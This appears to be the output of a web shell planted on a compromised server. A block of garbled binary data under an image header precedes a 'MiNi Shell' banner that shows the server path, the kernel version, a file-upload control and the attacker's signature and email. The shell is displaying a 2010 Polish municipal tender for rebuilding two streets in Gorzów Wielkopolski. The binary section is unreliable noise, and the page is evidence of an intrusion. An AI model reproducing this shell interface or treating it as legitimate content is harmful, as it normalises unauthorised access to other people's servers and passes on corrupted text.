JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100727/200647-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: Przebudowa ulic: Zadanie Nr 1: Przebudowa  ul. Kosynierów Gdyńskich, Zadanie Nr 2: Przebudowa ul. Łokietka - Wybickiego</b><br>
<b>Numer ogłoszenia: 200647 - 2010; data zamieszczenia: 27.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic: Zadanie Nr 1: Przebudowa  ul. Kosynierów Gdyńskich, Zadanie Nr 2: Przebudowa ul. Łokietka - Wybickiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 : Przebudowa ul.Kosynierów Gdyńskich.
Droga powiatowa Nr 2515 F klasy G - na odcinku od Ronda Kos. Gdyńskich do ul.Bolesława Krzywoustego w Gorzowie Wlkp. Na planowanym odcinku prowadzenia robóttj. Od km 0+000 do km 0+220 po wykonaniu frezowania nawierzchni przełożone  zostaną istniejące  i ułożone nowe krawężniki kamienne a następnie ułożone zostaną nowe warstwy nawierzchni jezdni.
Od km 0+127,5 do   do końca opracowania po lewej stronie występuje pas nawierzchni szerokości ok 3 m, na którym nie będą  prowadzone żadne prace  budowlane. Na pozostałej części ulicy po wykonaniu  frezowana ułożone zostaną     warstwy  :   wyrównawcza, wiążąca  i ścieralna. Na chodniku po prawej stronie na odcinku od km 0+022 do km 0+106 wykonany   zostanie ściek z kostki   betonowej.

Zdanie Nr 2 : Przebudowa ul. Łokietka - Wybickiego.
Droga wojewódzka nr 132 klasy G - na odcinku od Ronda Kos. Gdyńskich do mostku na ul. Wybickiego w Gorzowie Wlkp. Na planowanym odcinku prowadzenia robót tj. Od km 0+000 do km 0+205 po wykonaniu frezowania nawierzchni przełożone zostaną istniejące  i ułożone nowe krawężniki kamienne a następnie ułożone zostaną nowe warstwy nawierzchni jezdni. Od km 0+071 do 0+173 po lewej stronie, gdzie nawierzchnia nie będzie frezowana ułożona zostanie tylko warstwa ścieralna nawierzchni, a na pozostałej części ulicy po wykonaniu frezowania ułożone zostaną warstwy wyrównawcze, wiążąca i ścieralna..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających  zgodnie z art.67 ust.1 pkt 6 ustawy Pzp polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego, dla każdego z zadań częściowych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-1, 45.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy składają wadium odrębnie na każde z zadań częściowych.
Zadanie Nr 1 - 10.000,00 zł  (słownie:   dziesięć tysięcy złotych 00/100 )
Zadanie Nr 2 - 12.000,00 zł  (słownie:   dwanaście tysięcy  00/100 )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykonali w ciągu ostatnich pięciu lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie o  wartości nie mniejszej niż 200 000,00 PLN brutto  lub dwa o wartości nie mniejszej niż 100 000,00PLN każde, polegające na budowie, przebudowie lub remoncie ulic o nawierzchni bitumicznej wraz z chodnikami i załączą dokument  potwierdzający, że roboty te zostały  wykonane zgodnie  z  zasadami  sztuki    budowlanej i prawidłowo   ukończone (np. Referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy dysponujący odpowiednim potencjałem technicznym tj. co najmniej jedną/jednym:
        -     rozkładarką mas bitumicznych,
        -     frezarką do nawierzchni bitumicznej,
        -     samochodem samowyładowczym,
        -     szczotką mechaniczną,
        -     skrapiarką,
        -     walcem statycznym samojezdnym,
        -     walcem wibracyjnym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  kwotę  nie mniejszą  niż 150.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie  (w  formie oryginału  lub  notarialnie  potwierdzonej  kopii) dla  osoby reprezentującej Wykonawcę,   o  ile  nie  wynika  to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku wykonawców.
2. Dowód wniesienia wadium (odrębny dla każdego zadania).
3. Wypełnioną Tabelę Elementów Rozliczeniowych.
4. Pisemne  zobowiązanie  innych  podmiotów  do  oddania  Wykonawcy  do dyspozycji niezbędnych zasobów na okres  korzystania  z  nich  przy wykonywaniu  zamówienia  -  zgodnie   z   art.  26 ust. 2b  ustawy Pzp,  jeżeli  Wykonawca wskaże, że polega na potencjale technicznym  innych podmiotów.
5. Jeżeli   wystąpią   podwykonawcy,  wskazanie  części    zamówienia,   której   wykonanie    Wykonawca     powierzy podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość  dokonania  zmiany  terminu  wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany takie mogą wystąpić w przypadku:
     - konieczności  udzielenia  i  wykonania  zamówień  dodatkowych  na  podstawie  art. 67  ust.1 pkt 5 ustawy Pzp, jeżeli Wykonawca w związku   z  wykonywaniem  zamówienia  dodatkowego  nie będzie mógł dotrzymać terminu realizacji przedmiotu niniejszej specyfikacji (zamówienie podstawowe),
    - wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany,
    - działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia,
Zamawiający przewiduje również możliwość dokonania zmiany umowy w przypadku:
      - zlecenia przez Wykonawcę części robót podwykonawcy lub zatrudnienia przez Wykonawcę innego podwykonawcy niż wskazany w umowie. Warunkiem powyższej zmiany jest przedłożenie  propozycji  zmiany  nie  później  niż  7  dni  przed  planowanym  dopuszczeniem do wykonania robót któregokolwiek podwykonawcy, uzasadnienie  ich  przez  Wykonawcę na piśmie i zaakceptowanie przez Zamawiającego na piśmie.
      - zmiany   przepisów   dotyczących   stawki   podatku  VAT - nastąpi  zmiana  wynagrodzenia  Wykonawcy  o  wartość zmienionego podatku VAT,
      - wystąpienia robót zamiennych.
Zamawiający dopuszcza dokonanie zmiany w umowie, jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul.Sikorskiego 3-4, pok. 315, 66-400 Gorzów Wlkp. SIWZ w formie wyruku - płatna 140,00 PLN. Wersja elektroniczna SIWZ do bezpłatnego pobrania ze strony www.bip.gorzow.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 11:00, miejsce: Urząd Miasta Gorzowa Wlkp. Wydział Dróg i Transportu Publicznego ul. Okólna 2  pokój 101..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa  ul. Kosynierów Gdyńskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania przewiduje się:
ochronę istniejących drzew,
frezowanie nawierzchni,
rozbiórkę nawierzchni chodnika z płyt betonowych 35x35x5,
rozbiórkę nawierzchni chodnika z kostki brukowej grub. 8 cm,
rozbiórkę nawierzchni chodnika z mieszanek mineralno-bitumicznych gr. 4 cm,
rozbiórkę nawierzchni chodnika z kostki kamiennej nieregularnej gr. 8 cm,
rozbiórkę nawierzchni chodnika z brukowca 16-20cm,
rozbiórkę krawężników kamiennych  20x25,
rozbiórkę krawężników betonowych wraz z ławą,
rozbiórkę obrzeży betonowych 8x30,
regulację pionową studni rewizyjnych,  pionową kratek ulicznych,
regulację wysokościową studni telekomunikacyjnych, zaworów wodociągowych, zaworów gazowych,
ustawienie krawężników kamiennych 20x25 lub z rozbiórki na ławie C 12/15 z oporem,
ustawienie krawężników kamiennych 12/20 na ławie z betonu C 12/15 z oporem
wykonanie warstwy wyrównawczej, wiążącej i ścieralnej z BA,
ułożenie nawierzchni ścieku w chodniku z kostki betonowej,
ułożenie nawierzchni z kostki kamiennej rzędowej  granitowej gr. 16-20 cm (zjazdy),
ułożenie nawierzchni z kostki kamiennej rzędowej granitowej gr, 9-11 cm (chodniki),
wykonanie chodników z płyt betonowych 35x35 z domieszką kolorowego kruszywa,
humusowanie z obsianiem terenów zielonych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-1, 45.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ul. Łokietka - Wybickiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania przewiduje się:
ochronę istniejących drzew,
frezowanie nawierzchni,
rozbiórkę nawierzchni chodnika z płyt betonowych 35x35x5,
rozbiórkę nawierzchni chodnika z kostki brukowej grub. 8 cm,
rozbiórkę nawierzchni chodnika z  kostki kamiennej nieregularnej gr.8 cm
rozbiórkę krawężników kamiennych,
rozbiórkę krawężników betonowych wraz z ławą,
rozbiórkę obrzeży betonowych,
regulację studni rewizyjnych,  pionową kratek ulicznych,
regulację wysokościową studni telekomunikacyjnych, zaworów wodociągowych, zaworów gazowych,szafek el.
ułożenie krawężników kamiennych 20x25 lub z rozbiórki,
wykonanie warstwy wyrównawczej, wiążącej i ścieralnej z BA,
ułożenie nawierzchni z kostki kamiennej rzędowej  granitowej gr. 16-20 cm (zjazdy),
ułożenie nawierzchni z kostki kamiennej rzędowej granitowej gr, 9-11 cm (chodniki)
ułożenie nawierzchni ścieku w chodniku z kostki betonowej,
ułożenie nawierzchni chodników i nawierzchni zjazdów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-1, 45.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com